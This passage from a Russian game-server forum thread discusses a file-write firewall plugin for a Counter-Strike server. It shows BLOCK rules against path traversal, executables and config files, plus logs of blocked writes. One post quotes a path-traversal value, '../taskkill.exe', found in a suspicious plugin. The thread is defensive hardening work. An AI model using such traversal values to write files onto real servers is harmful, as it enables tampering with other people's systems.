Сообщение #19


Стаж: 15 лет

Сообщений: 1120
Благодарностей: 839
Полезность: 816

str_066 string "bannedcfgfile ../taskkill.exe" - как не хорошоу )
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя mazdan
сообщение 3.10.2013, 6:31
Сообщение #20


Иконка группы

Стаж: 15 лет

Сообщений: 7566
Благодарностей: 5437
Полезность: 1305

Конфиг
Цитата
// 1st ACCEPT or BLOCK file writing :D
// 2nd a file (with path), if you use 1st simbol "*" plugin will check containi rather equal, all * will be removed
// Priority like in firewall for competing rules like BLOCK *.cfg but ACCEPT listip.cfg, so listip.cfg must be first one


//try to block dir. changes
fw_add_file BLOCK "*..*"
fw_add_file BLOCK "*:*"

//first of all Enable logs!
fw_add_file ACCEPT "*.log"
fw_add_file ACCEPT "custom.hp2"
fw_add_file ACCEPT "custom.hpk"
fw_add_file ACCEPT ".temp"

//Enable Ban configs
fw_add_file ACCEPT listip.cfg
fw_add_file ACCEPT banned.cfg

//Block all other .cfg and other files
fw_add_file BLOCK "*.cfg"
fw_add_file BLOCK "*.ini"
fw_add_file BLOCK "*.rc"
fw_add_file BLOCK "*.exe"
fw_add_file BLOCK "*.dsr"
fw_add_file BLOCK "*.com"
fw_add_file BLOCK "*.bat"
fw_add_file BLOCK "*.dll"
fw_add_file BLOCK "*.txt"

//dir block examples we already allowed .log files so we can BLOCK other
fw_add_file BLOCK "logs\*"

fw_add_file BLOCK "addons\metamod\*"
fw_add_file BLOCK "addons\amxmodx\configs*"

//ACCEPT or (you can BLOCK) all about we dont know :D BLOCK is a default
fw_add_file BLOCK "*.*"

Реально кроме .log и не светится ничего практически.

Скрытый текст
Rule [#8] BLOCK addons\metamod\exec1.cfg
Rule [#8] BLOCK addons\metamod\exec2.cfg
Rule [#8] BLOCK addons\amxmodx\configs\cmd.cfg
Rule [#20] BLOCK addons\amxmodx\plugins\votecmd.amxx
Rule [#20] BLOCK addons\amxmodx\plugins\adminss.amxx
Rule [#9] BLOCK addons\amxmodx\configs\maps\plugins-de.ini
Rule [#9] BLOCK addons\amxmodx\configs\maps\plugins-fy.ini
Rule [#9] BLOCK addons\amxmodx\configs\maps\plugins-deathrun.ini
Rule [#9] BLOCK addons\amxmodx\configs\maps\plugins-awp.ini
Rule [#9] BLOCK addons\amxmodx\configs\maps\plugins-zm.ini
Rule [#9] BLOCK addons\metamod\plugins-zm.ini
Rule [#9] BLOCK addons\metamod\plugins-awp.ini
Rule [#9] BLOCK addons\metamod\plugins-deathrun.ini
Rule [#9] BLOCK addons\metamod\plugins-fy.ini
Rule [#9] BLOCK addons\metamod\plugins-de.ini
Rule [#8] BLOCK addons\amxmodx\configs\maps\de_dust.cfg
Rule [#8] BLOCK addons\amxmodx\configs\maps\de_dust2x2.cfg
Rule [#8] BLOCK addons\amxmodx\configs\maps\de_italy.cfg

Скрытый текст
Rule [#20] BLOCK addons\amxmodx\plugins\kickfakev1.amxx
Rule [#9] BLOCK addons\amxmodx\configs\plugins-amxx.ini
Rule [#9] BLOCK addons\amxmodx\configs\plugins-protect.ini
Rule [#9] BLOCK addons\amxmodx\configs\plugins-maps.ini
Rule [#9] BLOCK addons\amxmodx\configs\plugins-engine.ini
Rule [#9] BLOCK addons\amxmodx\configs\plugins-dproto.ini
Rule [#9] BLOCK addons\amxmodx\configs\plugins-amx.ini
Rule [#20] BLOCK sound\turret\tu_ping.wav.ztmp

Цитата
И вот Сам виновник:
Сам виновник в первом посте, правило вам жирным выделил, у вас оно с номером 19 и начинается с ACCEPT вместо BLOCK.
Цитата
это не подмена а фейк создается через прекеш в плагине без наличия файла, а чекеры и кс отмечают как закачку файла.

Ой, ну да, только вот, для проверки никто обычно CaseSensExt не использует. Файл не вышло залить вот и ошибка.


Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
2 страниц V   1 2
 
Ответить в данную темуНачать новую тему
 
0 пользователей и 1 гостей читают эту тему: